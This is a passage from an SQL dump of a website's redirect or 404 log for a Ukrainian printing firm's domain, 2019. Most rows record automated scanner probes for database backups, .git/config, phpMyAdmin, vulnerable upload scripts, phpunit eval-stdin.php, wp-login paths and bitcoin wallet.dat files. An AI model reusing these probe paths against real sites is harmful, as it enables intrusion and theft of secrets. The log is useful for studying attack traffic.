00:00:00',301),(15194,'https://ekvatorprint.com.ua/backups.gz',NULL,'','',2,0,'2019-07-26 09:49:30','0000-00-00 00:00:00',301),(15195,'https://ekvatorprint.com.ua/db.zip',NULL,'','',5,0,'2019-07-26 09:49:30','0000-00-00 00:00:00',301),(15196,'https://ekvatorprint.com.ua/main.zip',NULL,'','',1,0,'2019-07-26 09:49:31','0000-00-00 00:00:00',301),(15197,'https://ekvatorprint.com.ua/db.sql.zip',NULL,'','',2,0,'2019-07-26 09:49:31','0000-00-00 00:00:00',301),(15198,'https://ekvatorprint.com.ua/database.sql',NULL,'','',4,0,'2019-07-26 09:49:31','0000-00-00 00:00:00',301),(15199,'https://ekvatorprint.com.ua/shop.sql.zip',NULL,'','',1,0,'2019-07-26 09:49:32','0000-00-00 00:00:00',301),(15200,'https://ekvatorprint.com.ua/main.gz',NULL,'','',1,0,'2019-07-26 09:49:32','0000-00-00 00:00:00',301),(15201,'https://ekvatorprint.com.ua/www.zip',NULL,'','',6,0,'2019-07-26 09:49:33','0000-00-00 00:00:00',301),(15202,'https://ekvatorprint.com.ua/ekvatorprint.sql.zip',NULL,'','',4,0,'2019-07-26 09:49:33','0000-00-00 00:00:00',301),(15203,'https://ekvatorprint.com.ua/main.sql.gz',NULL,'','',1,0,'2019-07-26 09:49:34','0000-00-00 00:00:00',301),(15204,'https://ekvatorprint.com.ua/dump.tar',NULL,'','',4,0,'2019-07-26 09:49:34','0000-00-00 00:00:00',301),(15205,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.tar',NULL,'','',10,0,'2019-07-26 09:49:35','0000-00-00 00:00:00',301),(15206,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.sql.gz',NULL,'','',7,0,'2019-07-26 09:49:35','0000-00-00 00:00:00',301),(15207,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.gz',NULL,'','',6,0,'2019-07-26 09:49:35','0000-00-00 00:00:00',301),(15208,'https://ekvatorprint.com.ua/backup.sql.zip',NULL,'','',3,0,'2019-07-26 09:49:36','0000-00-00 00:00:00',301),(15209,'https://ekvatorprint.com.ua/wwwroot.gz',NULL,'','',1,0,'2019-07-26 09:49:36','0000-00-00 00:00:00',301),(15210,'https://ekvatorprint.com.ua/database.sql.gz',NULL,'','',3,0,'2019-07-26 09:49:37','0000-00-00 00:00:00',301),(15211,'https://ekvatorprint.com.ua/main.tar',NULL,'','',1,0,'2019-07-26 09:49:38','0000-00-00 00:00:00',301),(15212,'https://ekvatorprint.com.ua/database.sql.zip',NULL,'','',2,0,'2019-07-26 09:49:38','0000-00-00 00:00:00',301),(15213,'https://ekvatorprint.com.ua/backups.sql.tar',NULL,'','',2,0,'2019-07-26 09:49:38','0000-00-00 00:00:00',301),(15214,'https://ekvatorprint.com.ua/db.gz',NULL,'','',5,0,'2019-07-26 09:49:39','0000-00-00 00:00:00',301),(15215,'https://ekvatorprint.com.ua/dump.zip',NULL,'','',5,0,'2019-07-26 09:49:39','0000-00-00 00:00:00',301),(15216,'https://ekvatorprint.com.ua/mysql.zip',NULL,'','',1,0,'2019-07-26 09:49:40','0000-00-00 00:00:00',301),(15217,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.sql.zip',NULL,'','',3,0,'2019-07-26 09:49:40','0000-00-00 00:00:00',301),(15218,'https://ekvatorprint.com.ua/dump.sql',NULL,'','',12,0,'2019-07-26 09:49:40','0000-00-00 00:00:00',301),(15219,'https://ekvatorprint.com.ua/www.sql.gz',NULL,'','',2,0,'2019-07-26 09:49:41','0000-00-00 00:00:00',301),(15220,'https://ekvatorprint.com.ua/database.tar',NULL,'','',4,0,'2019-07-26 09:49:41','0000-00-00 00:00:00',301),(15221,'https://ekvatorprint.com.ua/backups.sql.gz',NULL,'','',2,0,'2019-07-26 09:49:42','0000-00-00 00:00:00',301),(15222,'https://ekvatorprint.com.ua/wwwroot.zip',NULL,'','',2,0,'2019-07-26 09:49:42','0000-00-00 00:00:00',301),(15223,'https://ekvatorprint.com.ua/profile/upload/server/php/',NULL,'http://ekvatorprint.com.ua/profile/upload/server/php/','',1,0,'2019-07-26 15:13:35','0000-00-00 00:00:00',301),(15224,'https://ekvatorprint.com.ua/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',11,0,'2019-07-26 22:33:21','0000-00-00 00:00:00',301),(15225,'http://ekvatorprint.com.ua/wp-content/plugins/ad-inserter/readme.txt',NULL,'','',1,0,'2019-07-27 09:19:37','0000-00-00 00:00:00',301),(15226,'https://ekvatorprint.com.ua/wp-content/plugins/console_contact_form/upload_file.php?files',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/console_contact_form/upload_file.php?files','',1,0,'2019-07-27 13:40:40','0000-00-00 00:00:00',301),(15227,'https://ekvatorprint.com.ua/vjjz2polkjcth6lvnq1gvht9rdmez',NULL,'','',1,0,'2019-07-28 20:27:50','0000-00-00 00:00:00',301),(15228,'https://ekvatorprint.com.ua/saless.php?check=x',NULL,'','',2,0,'2019-07-28 23:31:37','0000-00-00 00:00:00',301),(15229,'http://ekvatorprint.com.ua/banner-printing/templates/gk_ilife/favicon.ico',NULL,'','',10,0,'2019-07-29 21:15:00','0000-00-00 00:00:00',301),(15230,'https://ekvatorprint.com.ua/xiseiqdhx6duff4zjwr24g',NULL,'','',1,0,'2019-07-30 00:12:06','0000-00-00 00:00:00',301),(15231,'https://ekvatorprint.com.ua/js/calendar/cfd.php',NULL,'','',1,0,'2019-07-30 01:31:49','0000-00-00 00:00:00',301),(15232,'https://ekvatorprint.com.ua/wp/',NULL,'','',53,0,'2019-07-30 07:18:37','0000-00-00 00:00:00',301),(15233,'https://ekvatorprint.com.ua/new/',NULL,'','',53,0,'2019-07-30 07:18:38','0000-00-00 00:00:00',301),(15234,'https://ekvatorprint.com.ua/old/',NULL,'','',46,0,'2019-07-30 07:18:38','0000-00-00 00:00:00',301),(15235,'https://ekvatorprint.com.ua/test/',NULL,'','',44,0,'2019-07-30 07:18:39','0000-00-00 00:00:00',301),(15236,'https://ekvatorprint.com.ua/main/',NULL,'','',38,0,'2019-07-30 07:18:39','0000-00-00 00:00:00',301),(15237,'https://ekvatorprint.com.ua/site/',NULL,'','',45,0,'2019-07-30 07:18:40','0000-00-00 00:00:00',301),(15238,'https://ekvatorprint.com.ua/backup/',NULL,'','',40,0,'2019-07-30 07:18:40','0000-00-00 00:00:00',301),(15239,'https://ekvatorprint.com.ua/demo/',NULL,'','',37,0,'2019-07-30 07:18:41','0000-00-00 00:00:00',301),(15240,'https://ekvatorprint.com.ua/cms/',NULL,'','',43,0,'2019-07-30 07:18:43','0000-00-00 00:00:00',301),(15241,'https://ekvatorprint.com.ua/dev/',NULL,'','',35,0,'2019-07-30 07:18:44','0000-00-00 00:00:00',301),(15242,'https://ekvatorprint.com.ua/portal/',NULL,'','',5,0,'2019-07-30 07:18:45','0000-00-00 00:00:00',301),(15243,'https://ekvatorprint.com.ua/web/',NULL,'','',43,0,'2019-07-30 07:18:46','0000-00-00 00:00:00',301),(15244,'https://ekvatorprint.com.ua/temp/',NULL,'','',39,0,'2019-07-30 07:18:46','0000-00-00 00:00:00',301),(15245,'https://ekvatorprint.com.ua/index.php/forum/index',NULL,'','',1,0,'2019-07-30 09:14:29','0000-00-00 00:00:00',301),(15246,'http://ekvatorprint.com.ua/static/image/admincp/logo.gif',NULL,'http://ekvatorprint.com.ua/static/image/admincp/logo.gif','',1,0,'2019-07-30 16:03:19','0000-00-00 00:00:00',301),(15247,'https://ekvatorprint.com.ua/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php','',1,0,'2019-07-30 17:40:26','0000-00-00 00:00:00',301),(15248,'https://ekvatorprint.com.ua/kbrwlf2eejsurvxoag4tqy',NULL,'','',1,0,'2019-07-30 22:42:59','0000-00-00 00:00:00',301),(15249,'https://ekvatorprint.com.ua/com.sql',NULL,'http://ekvatorprint.com.ua/com.sql','',4,0,'2019-07-30 23:16:48','0000-00-00 00:00:00',301),(15250,'https://ekvatorprint.com.ua/[asdomaincom].sql',NULL,'http://ekvatorprint.com.ua/[asDomaincom].sql','',2,0,'2019-07-30 23:18:57','0000-00-00 00:00:00',301),(15251,'https://ekvatorprint.com.ua/com.sql.zip',NULL,'http://ekvatorprint.com.ua/com.sql.zip','',3,0,'2019-07-30 23:20:09','0000-00-00 00:00:00',301),(15252,'https://ekvatorprint.com.ua/[asdomaincom].sql.zip',NULL,'http://ekvatorprint.com.ua/[asDomaincom].sql.zip','',1,0,'2019-07-31 00:05:37','0000-00-00 00:00:00',301),(15253,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.sql.tar.gz',NULL,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.sql.tar.gz','',3,0,'2019-07-31 00:20:23','0000-00-00 00:00:00',301),(15254,'https://ekvatorprint.com.ua/[asdomaincom].sql.tar.gz',NULL,'http://ekvatorprint.com.ua/[asDomaincom].sql.tar.gz','',1,0,'2019-07-31 00:28:36','0000-00-00 00:00:00',301),(15255,'https://ekvatorprint.com.ua/com.sql.rar',NULL,'http://ekvatorprint.com.ua/com.sql.rar','',1,0,'2019-07-31 00:34:42','0000-00-00 00:00:00',301),(15256,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.sql.rar',NULL,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.sql.rar','',1,0,'2019-07-31 00:41:50','0000-00-00 00:00:00',301),(15257,'https://ekvatorprint.com.ua/[asdomaincom].sql.rar',NULL,'http://ekvatorprint.com.ua/[asDomaincom].sql.rar','',1,0,'2019-07-31 00:49:41','0000-00-00 00:00:00',301),(15258,'https://ekvatorprint.com.ua/[asdomaincom].sql.backup',NULL,'http://ekvatorprint.com.ua/[asDomaincom].sql.backup','',1,0,'2019-07-31 01:11:05','0000-00-00 00:00:00',301),(15259,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.sql.7z',NULL,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.sql.7z','',1,0,'2019-07-31 01:25:38','0000-00-00 00:00:00',301),(15260,'https://ekvatorprint.com.ua/[asdomaincom].sql.7z',NULL,'http://ekvatorprint.com.ua/[asDomaincom].sql.7z','',1,0,'2019-07-31 01:33:30','0000-00-00 00:00:00',301),(15261,'https://ekvatorprint.com.ua/copy/com.sql',NULL,'http://ekvatorprint.com.ua/copy/com.sql','',1,0,'2019-07-31 01:40:09','0000-00-00 00:00:00',301),(15262,'https://ekvatorprint.com.ua/copy/ekvatorprint.com.ua.sql',NULL,'http://ekvatorprint.com.ua/copy/ekvatorprint.com.ua.sql','',1,0,'2019-07-31 01:48:09','0000-00-00 00:00:00',301),(15263,'https://ekvatorprint.com.ua/copy/[asdomaincom].sql',NULL,'http://ekvatorprint.com.ua/copy/[asDomaincom].sql','',1,0,'2019-07-31 01:54:38','0000-00-00 00:00:00',301),(15264,'https://ekvatorprint.com.ua/backup/com.sql',NULL,'http://ekvatorprint.com.ua/backup/com.sql','',1,0,'2019-07-31 02:01:55','0000-00-00 00:00:00',301),(15265,'https://ekvatorprint.com.ua/backup/ekvatorprint.com.ua.sql',NULL,'http://ekvatorprint.com.ua/backup/ekvatorprint.com.ua.sql','',1,0,'2019-07-31 02:09:15','0000-00-00 00:00:00',301),(15266,'https://ekvatorprint.com.ua/dump/com.sql',NULL,'http://ekvatorprint.com.ua/dump/com.sql','',1,0,'2019-07-31 02:23:50','0000-00-00 00:00:00',301),(15267,'https://ekvatorprint.com.ua/dump/[asdomaincom].sql',NULL,'http://ekvatorprint.com.ua/dump/[asDomaincom].sql','',1,0,'2019-07-31 02:39:27','0000-00-00 00:00:00',301),(15268,'https://ekvatorprint.com.ua/mysql.sql.tar.gz',NULL,'http://ekvatorprint.com.ua/mysql.sql.tar.gz','',1,0,'2019-07-31 03:00:47','0000-00-00 00:00:00',301),(15269,'http://ekvatorprint.com.ua/wp-content/themes/clockstone/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/clockstone/style.css','',1,0,'2019-07-31 16:47:45','0000-00-00 00:00:00',301),(15270,'https://ekvatorprint.com.ua/modules/filesupload/upload.php',NULL,'http://ekvatorprint.com.ua/modules/filesupload/upload.php','',1,0,'2019-08-02 07:05:23','0000-00-00 00:00:00',301),(15271,'https://ekvatorprint.com.ua/site/wp-login.php',NULL,'','',19,0,'2019-08-02 20:21:44','0000-00-00 00:00:00',301),(15272,'https://ekvatorprint.com.ua/blogs/wp-login.php',NULL,'','',11,0,'2019-08-02 20:21:44','0000-00-00 00:00:00',301),(15273,'https://ekvatorprint.com.ua/news/wp-login.php',NULL,'','',16,0,'2019-08-02 20:21:44','0000-00-00 00:00:00',301),(15274,'https://ekvatorprint.com.ua/web/wp-login.php',NULL,'','',19,0,'2019-08-02 20:21:44','0000-00-00 00:00:00',301),(15275,'https://ekvatorprint.com.ua/en/wp-login.php',NULL,'','',14,0,'2019-08-02 20:21:44','0000-00-00 00:00:00',301),(15276,'https://ekvatorprint.com.ua/main/wp-login.php',NULL,'','',6,0,'2019-08-02 20:21:44','0000-00-00 00:00:00',301),(15277,'https://ekvatorprint.com.ua/home/wp-login.php',NULL,'','',14,0,'2019-08-02 20:21:44','0000-00-00 00:00:00',301),(15278,'https://ekvatorprint.com.ua/new/wp-login.php',NULL,'','',16,0,'2019-08-02 20:21:44','0000-00-00 00:00:00',301),(15279,'https://ekvatorprint.com.ua/templates/jtemplate/index.html',NULL,'https://ekvatorprint.com.ua/templates/jtemplate/index.html','',1,0,'2019-08-05 00:41:55','0000-00-00 00:00:00',301),(15280,'https://ekvatorprint.com.ua/soxrtiw7byit0g463usp/fgd5t5euqgq5u1ixv/56c52as31r',NULL,'','',1,0,'2019-08-05 06:12:29','0000-00-00 00:00:00',301),(15281,'https://ekvatorprint.com.ua/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php','',1,0,'2019-08-05 08:31:31','0000-00-00 00:00:00',301),(15282,'https://ekvatorprint.com.ua/wp1/',NULL,'','',31,0,'2019-08-06 09:58:43','0000-00-00 00:00:00',301),(15283,'https://ekvatorprint.com.ua/v1/',NULL,'','',32,0,'2019-08-06 09:59:11','0000-00-00 00:00:00',301),(15284,'https://ekvatorprint.com.ua/v2/',NULL,'','',32,0,'2019-08-06 09:59:26','0000-00-00 00:00:00',301),(15285,'https://ekvatorprint.com.ua/old/wp-includes/wlwmanifest.xml',NULL,'','',5,0,'2019-08-08 03:39:05','0000-00-00 00:00:00',301),(15286,'https://ekvatorprint.com.ua/backup/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2019-08-08 03:39:44','0000-00-00 00:00:00',301),(15287,'https://ekvatorprint.com.ua/new/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2019-08-08 03:40:00','0000-00-00 00:00:00',301),(15288,'https://ekvatorprint.com.ua/en/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2019-08-08 03:40:14','0000-00-00 00:00:00',301),(15289,'https://ekvatorprint.com.ua/dev/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2019-08-08 03:42:52','0000-00-00 00:00:00',301),(15290,'https://ekvatorprint.com.ua/home/wp-includes/wlwmanifest.xml',NULL,'','',5,0,'2019-08-08 03:42:59','0000-00-00 00:00:00',301),(15291,'https://ekvatorprint.com.ua/www/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2019-08-08 03:44:15','0000-00-00 00:00:00',301),(15292,'https://ekvatorprint.com.ua/staging/wp-includes/wlwmanifest.xml',NULL,'','',5,0,'2019-08-08 03:44:31','0000-00-00 00:00:00',301),(15293,'https://ekvatorprint.com.ua/main/wp-includes/wlwmanifest.xml',NULL,'','',5,0,'2019-08-08 03:46:28','0000-00-00 00:00:00',301),(15294,'https://ekvatorprint.com.ua/newsite/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2019-08-08 03:47:12','0000-00-00 00:00:00',301),(15295,'https://ekvatorprint.com.ua/v2/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2019-08-08 03:47:36','0000-00-00 00:00:00',301),(15296,'https://ekvatorprint.com.ua/oldsite/wp-includes/wlwmanifest.xml',NULL,'','',4,0,'2019-08-08 03:47:44','0000-00-00 00:00:00',301),(15297,'https://ekvatorprint.com.ua/2019/wp-includes/wlwmanifest.xml',NULL,'','',219,0,'2019-08-08 03:49:35','0000-00-00 00:00:00',301),(15298,'https://ekvatorprint.com.ua/v1/wp-includes/wlwmanifest.xml',NULL,'','',6,0,'2019-08-08 03:49:55','0000-00-00 00:00:00',301),(15299,'https://ekvatorprint.com.ua/store/wp-includes/wlwmanifest.xml',NULL,'','',4,0,'2019-08-08 03:50:33','0000-00-00 00:00:00',301),(15300,'https://ekvatorprint.com.ua/newsslide.php?name=htp://example.com&file=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:03:29','0000-00-00 00:00:00',301),(15301,'https://ekvatorprint.com.ua/images/newsrsss.php?name=htp://example.com&file=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:03:51','0000-00-00 00:00:00',301),(15302,'http://ekvatorprint.com.ua/ple.com&file=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:04:09','0000-00-00 00:00:00',301),(15303,'https://ekvatorprint.com.ua/-known.php?name=htp://example.com&file=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:04:33','0000-00-00 00:00:00',301),(15304,'http://ekvatorprint.com.ua/ample.com&file=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:04:46','0000-00-00 00:00:00',301),(15305,'https://ekvatorprint.com.ua/css/feal.php?name=htp://example.com&file=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:05:00','0000-00-00 00:00:00',301),(15306,'http://ekvatorprint.com.ua/ile=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:05:01','0000-00-00 00:00:00',301),(15307,'http://ekvatorprint.com.ua/name=htp:/example.com&file=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:05:03','0000-00-00 00:00:00',301),(15308,'https://ekvatorprint.com.ua/css/css.php?name=htp://example.com&file=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:05:23','0000-00-00 00:00:00',301),(15309,'https://ekvatorprint.com.ua/newsrsss.php?name=htp://example.com&file=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:05:35','0000-00-00 00:00:00',301),(15310,'https://ekvatorprint.com.ua/fonts/fonts.php?name=htp://example.com&file=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:05:37','0000-00-00 00:00:00',301),(15311,'https://ekvatorprint.com.ua/images/feal.php?name=htp://example.com&file=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:09:06','0000-00-00 00:00:00',301),(15312,'https://ekvatorprint.com.ua/images/newsslide.php?name=htp://example.com&file=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:09:56','0000-00-00 00:00:00',301),(15313,'https://ekvatorprint.com.ua/js/feal.php?name=htp://example.com&file=test.txt',NULL,'ekvatorprint.com.ua','',1,0,'2019-08-08 10:10:16','0000-00-00 00:00:00',301),(15314,'https://ekvatorprint.com.ua/blog/.git/config',NULL,'','',3,0,'2019-08-08 15:45:09','0000-00-00 00:00:00',301),(15315,'https://ekvatorprint.com.ua/itjdrfjqx2753xne615p2auved',NULL,'','',1,0,'2019-08-09 06:31:31','0000-00-00 00:00:00',301),(15316,'https://ekvatorprint.com.ua/wp/wp-admin/',NULL,'','',2,0,'2019-08-10 05:57:49','0000-00-00 00:00:00',301),(15317,'https://ekvatorprint.com.ua/wp-xmla.php',NULL,'','',1,0,'2019-08-13 21:53:11','0000-00-00 00:00:00',301),(15318,'https://ekvatorprint.com.ua/wp-admin/',NULL,'http://ekvatorprint.com.ua/wp-admin/','',7,0,'2019-08-14 09:00:48','0000-00-00 00:00:00',301),(15319,'http://ekvatorprint.com.ua/chrome-extension://eofcbnmajmjmplflapaojjnihcjkigck/common/ui/fonts/fonts.css',NULL,'','',1,0,'2019-08-16 20:01:15','0000-00-00 00:00:00',301),(15320,'http://ekvatorprint.com.ua/chrome-extension://fajafkhgbcekjfffgnpbbjhdhimgffec/styles.css',NULL,'','',1,0,'2019-08-17 02:32:27','0000-00-00 00:00:00',301),(15321,'https://ekvatorprint.com.ua/qyerlajcmv9of0hjwos2vpsr',NULL,'','',1,0,'2019-08-17 03:01:36','0000-00-00 00:00:00',301),(15322,'https://ekvatorprint.com.ua/pma/',NULL,'http://ekvatorprint.com.ua/pma/','',5,0,'2019-08-17 04:46:13','0000-00-00 00:00:00',301),(15323,'https://ekvatorprint.com.ua/bitcoin-core-0.10.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:03','0000-00-00 00:00:00',301),(15324,'https://ekvatorprint.com.ua/programs/bitcoin/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:06','0000-00-00 00:00:00',301),(15325,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.13.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:09','0000-00-00 00:00:00',301),(15326,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.17.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:12','0000-00-00 00:00:00',301),(15327,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.10.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:16','0000-00-00 00:00:00',301),(15328,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.11.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:18','0000-00-00 00:00:00',301),(15329,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.18.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:22','0000-00-00 00:00:00',301),(15330,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.10.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:24','0000-00-00 00:00:00',301),(15331,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.13.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:27','0000-00-00 00:00:00',301),(15332,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.17.0.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:30','0000-00-00 00:00:00',301),(15333,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.10.4/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:34','0000-00-00 00:00:00',301),(15334,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.16.3/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:36','0000-00-00 00:00:00',301),(15335,'https://ekvatorprint.com.ua/bitcoin-core-0.17.0.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:39','0000-00-00 00:00:00',301),(15336,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.14.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:42','0000-00-00 00:00:00',301),(15337,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.11.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:46','0000-00-00 00:00:00',301),(15338,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.16.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:48','0000-00-00 00:00:00',301),(15339,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.10.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:51','0000-00-00 00:00:00',301),(15340,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.11.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:54','0000-00-00 00:00:00',301),(15341,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.14.3/wallet.dat',NULL,'','',1,0,'2019-08-17 11:12:58','0000-00-00 00:00:00',301),(15342,'https://ekvatorprint.com.ua/bitcoin-core-0.10.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:03','0000-00-00 00:00:00',301),(15343,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.14.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:06','0000-00-00 00:00:00',301),(15344,'https://ekvatorprint.com.ua/bitcoin-core-0.10.4/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:08','0000-00-00 00:00:00',301),(15345,'https://ekvatorprint.com.ua/bitcoin-core-0.12.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:12','0000-00-00 00:00:00',301),(15346,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.17.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:15','0000-00-00 00:00:00',301),(15347,'https://ekvatorprint.com.ua/bitcoin-core-0.16.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:18','0000-00-00 00:00:00',301),(15348,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.16.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:20','0000-00-00 00:00:00',301),(15349,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.18.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:23','0000-00-00 00:00:00',301),(15350,'https://ekvatorprint.com.ua/bitcoin-core-0.16.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:26','0000-00-00 00:00:00',301),(15351,'https://ekvatorprint.com.ua/bitcoin-core-0.16.3/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:30','0000-00-00 00:00:00',301),(15352,'https://ekvatorprint.com.ua/bitcoin-core-0.15.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:32','0000-00-00 00:00:00',301),(15353,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.12.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:35','0000-00-00 00:00:00',301),(15354,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.13.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:38','0000-00-00 00:00:00',301),(15355,'https://ekvatorprint.com.ua/bitcoin-core-0.15.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:41','0000-00-00 00:00:00',301),(15356,'https://ekvatorprint.com.ua/bitcoin-core-0.14.3/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:44','0000-00-00 00:00:00',301),(15357,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.9.5/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:47','0000-00-00 00:00:00',301),(15358,'https://ekvatorprint.com.ua/bitcoin-core-0.11.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:50','0000-00-00 00:00:00',301),(15359,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.13.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:53','0000-00-00 00:00:00',301),(15360,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.10.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:13:57','0000-00-00 00:00:00',301),(15361,'https://ekvatorprint.com.ua/bitcoin-core-0.10.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:03','0000-00-00 00:00:00',301),(15362,'https://ekvatorprint.com.ua/bitcoin-core-0.16.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:05','0000-00-00 00:00:00',301),(15363,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.18.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:09','0000-00-00 00:00:00',301),(15364,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.11.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:12','0000-00-00 00:00:00',301),(15365,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.13.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:14','0000-00-00 00:00:00',301),(15366,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.15.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:18','0000-00-00 00:00:00',301),(15367,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.12.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:21','0000-00-00 00:00:00',301),(15368,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.16.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:23','0000-00-00 00:00:00',301),(15369,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.16.3/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:26','0000-00-00 00:00:00',301),(15370,'https://ekvatorprint.com.ua/bitcoin-core-0.17.0/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:29','0000-00-00 00:00:00',301),(15371,'https://ekvatorprint.com.ua/bitcoin-core-0.10.3/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:33','0000-00-00 00:00:00',301),(15372,'https://ekvatorprint.com.ua/bitcoin-core-0.18.1/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:36','0000-00-00 00:00:00',301),(15373,'https://ekvatorprint.com.ua/programs/bitcoin-core-0.9.5/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:39','0000-00-00 00:00:00',301),(15374,'https://ekvatorprint.com.ua/bitcoin/bitcoin-core-0.13.2/wallet.dat',NULL,'','',1,0,'2019-08-17 11:14:42','0000-00-00 